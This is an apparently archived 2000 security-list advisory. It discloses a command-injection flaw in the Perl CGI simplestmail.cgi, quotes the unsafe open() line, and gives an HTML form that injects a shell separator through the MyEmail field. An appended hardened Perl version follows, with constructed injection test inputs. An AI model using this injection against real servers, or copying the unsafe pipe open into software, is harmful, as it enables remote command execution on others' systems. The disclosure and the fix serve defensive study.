Subject: Insecure input validation in simplestmail.cgi (remote command execution)
From: rpc (hCKZ.ORG)
Date: Mon Dec 11 2000 - 08:46:39 CST


Hi Again,

simplestmail.cgi is another Perl CGI written by "Tammie's HUSBAND" Leif Wright.

It's available from:
http://www.conservatives.net/atheist/scripts/index.html?simplestmail

The code is self-explanatory:

----code snippet----
$youremail = $contents_by_name{'MyEmail'};
open (MAIL, "|$mailprog $youremail") || die "Can't open $mailprog!\n";
-----------------

Exploitation is straightforward:

<html>
<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>
Command: <input type=text name=MyEmail value=";">
<input type=hidden name=redirect value="http://goatse.cx">
<input type=submit name=submit value="run">
</form>
</html>

--rpc
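
A hardened form of the quoted `open` call, as an added example that is not part of the original post or of the script it discusses. The sendmail path and the helper names `valid_address` and `send_mail` are assumptions made for illustration, and the sample inputs are constructed.

```perl
use strict;
use warnings;

# Assumed path; the original script sets $mailprog in its own configuration.
my $mailprog = '/usr/sbin/sendmail';

# Hypothetical helper: conservative allow-list for an address from a form field.
# Rejects shell metacharacters, whitespace, newlines, and a leading '-'
# (which the mailer would otherwise parse as a command-line option).
sub valid_address {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9_][A-Za-z0-9._+-]*\@[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?\z/ ? 1 : 0;
}

# Hypothetical helper: send a message without ever involving /bin/sh.
sub send_mail {
    my ($to, $subject, $body) = @_;
    die "rejected address\n" unless valid_address($to);
    $subject =~ s/[\r\n]+/ /g;    # keep form input from adding extra headers

    # List-form pipe open: perl exec()s $mailprog directly, so ';', '|' and
    # backticks in data are never interpreted by a shell. The recipient goes
    # in the To: header (read by -t), not on the command line; -oi stops a
    # lone '.' line from ending the message early.
    open(my $mail, '|-', $mailprog, '-oi', '-t')
        or die "Can't open $mailprog: $!\n";
    print {$mail} "To: $to\n", "Subject: $subject\n\n", $body, "\n";
    close($mail) or die "$mailprog exited with status $?\n";
}

# Constructed sample inputs: one ordinary address and several that the
# original one-argument open() would have handed to the shell or the mailer.
for my $in ('user@example.com', ';', 'a@b.c; id', '-oQ/tmp@x.y', "a\@b.c\nBcc: x\@y.z") {
    (my $shown = $in) =~ s/\n/\\n/g;
    printf "%-24s %s\n", $shown, valid_address($in) ? 'accept' : 'reject';
}
```

The validation and the shell-free `open` are independent layers: either one alone blocks the `MyEmail` value shown in the form above, and the script should keep both.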